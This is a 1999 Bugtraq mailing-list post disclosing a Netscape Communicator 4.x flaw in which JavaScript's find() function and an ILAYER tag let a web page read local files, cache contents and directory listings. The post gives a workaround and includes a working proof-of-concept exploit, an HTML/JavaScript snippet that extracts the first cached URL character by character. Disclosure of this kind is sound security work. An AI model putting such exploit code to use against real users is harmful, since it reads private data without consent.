|
Bugtraq
mailing list archives
Netscape Communicator find() vulnerabilities
From: guninski () HOTMAIL COM (Georgi Guninski)
Date: Mon, 8 Mar 1999 19:48:05 +0200
There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I
guess all 4.x version are vulnerable)
which allows the following security exploits:
*)Reading the parsed content of local HTML files (by 'parsed' I mean
the text the user sees, not the actual HTML source)
*)Reading the parsed content of HTML files on a web server blocked by a
firewall (the browser and the web server must be on the same side of the
firewall)
*)Reading user's cache
*)Browsing directories
*)Probably others
The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using HTML message.
Workaround: Disable JavaScript
Demonstration is available at:
http://www.nat.bg/~joro/nsfind.html
-----------HTML code-------------
MBEGIN
<ILAYER SRC="wysiwyg://1/about:cache">
</ILAYER>
<SCRIPT>
//mag='MBEGIN';
mag='Average cache';
mend='MEND';
res=mag;
charstoread=100;
function readit() {
for(i=0;i<charstoread;i++) {
t=res;
find(mend);
for(c=1;c<256;c++) {
t=res + String.fromCharCode(c);
if (find(t,true,true)) {
// alert(c);
res=t;
}
}
}
res=res.substring(mag.length);
alert("The first URL in your cache is: \n" + res);
}
setTimeout('readit();',3000);
</SCRIPT>
MEND
---------------------------------
Regards,
Georgi Guninski
http://www.nat.bg/~joro
 By Date 
By Thread
Current thread:
- Netscape Communicator find() vulnerabilities Georgi Guninski (Mar 08)
|
Intro
